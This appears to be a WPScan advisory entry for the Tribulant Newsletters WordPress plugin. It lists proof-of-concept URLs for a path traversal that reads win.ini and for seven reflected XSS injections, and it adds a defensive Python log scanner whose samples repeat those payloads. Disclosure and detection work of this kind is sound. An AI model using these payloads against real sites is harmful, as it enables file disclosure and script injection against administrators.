Tribulant Newsletters <= 4.6.4.2 – Multiple Vulnerabilities


Proof of Concept
3.1 File disclosure
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini

3.2 Cross-Site Scripting
Vulnerable Parameter: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=checkexpired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.3 Cross-Site Scripting
Vulnerable Parameter: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletterssubscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note:
The subscriber id (parameter "id") must exist; a value of 1 is a reasonable first guess.

3.4 Cross-Site Scripting
Vulnerable Parameter: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletterslists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.5 Cross-Site Scripting
Vulnerable Parameter: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/adminajax.php?action=newsletters_gauge&value=1});alert(1);</script>

3.6 Cross-Site Scripting
Vulnerable Parameter: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

3.7 Cross-Site Scripting
Vulnerable Parameter: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.8 Cross-Site Scripting
Vulnerable Parameter: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletterssubscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
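
As an added defensive example that is not part of the WPVDB record or the DefenseCode advisory: a Python scanner that flags access-log requests matching the patterns above (traversal sequences in the history export "file" parameter, and markup in the parameters listed as vulnerable to reflected XSS). The log lines are constructed samples, and the assumption that every affected page slug or AJAX action starts with "newsletters" is drawn from the URLs above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters named in the advisory's proof-of-concept URLs.
TRAVERSAL_PARAM = "file"
XSS_PARAMS = {"method", "id", "value", "order", "wpmlsearchterm", "wpmlmessage"}
# Request line inside an Apache/nginx combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<verb>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return a list of findings for one request target, [] if nothing matched."""
    url = urlsplit(target)
    if not url.path.endswith(("/wp-admin/admin.php", "/wp-admin/admin-ajax.php")):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    # Assumption: plugin pages/actions all begin with "newsletters" (see PoC URLs).
    handler = (params.get("page") or params.get("action") or [""])[0]
    if not handler.startswith("newsletters"):
        return []
    findings = []
    for raw in params.get(TRAVERSAL_PARAM, []):
        # Decode a second time so double-encoded "%255c" is caught as well.
        if re.search(r"\.\.[\\/]", unquote(raw)):
            findings.append(f"traversal in {TRAVERSAL_PARAM}= ({handler})")
    for name in sorted(XSS_PARAMS.intersection(params)):
        for raw in params[name]:
            if re.search(r"""[<>"']""", unquote(raw)):
                findings.append(f"markup in {name}= ({handler})")
    return findings

def scan_log(lines):
    """Return (line_number, finding) pairs for suspicious requests in log lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, f) for f in classify_request(match.group("target")))
    return hits

# Constructed sample log lines: one benign listing, the traversal PoC shape,
# the reflected-XSS PoC shape, and a benign subscriber view.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/May/2017:10:00:01 +0000] "GET /wp-admin/admin.php?page=newsletters-history&method=list HTTP/1.1" 200 5120',
    '203.0.113.5 - - [31/May/2017:10:00:02 +0000] "GET /wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5cWINDOWS%5cwin.ini HTTP/1.1" 200 920',
    '203.0.113.5 - - [31/May/2017:10:00:03 +0000] "GET /wp-admin/admin.php?page=newsletters-subscribers&method=checkexpired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 4100',
    '203.0.113.5 - - [31/May/2017:10:00:04 +0000] "GET /wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```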

Affects Plugin

Fixed in version 4.6.5

References

URL http://defensecode.com/advisories/DC-2017-01-012_WordPress_Tribulant_Newsletters_Plugin_Advisory.pdf

Classification

Type MULTI

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter DefenseCode
Verified No
WPVDB ID 8839

Timeline

Publicly Published 2017-05-31
Added 2017-06-01
Last Updated 2017-06-01

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.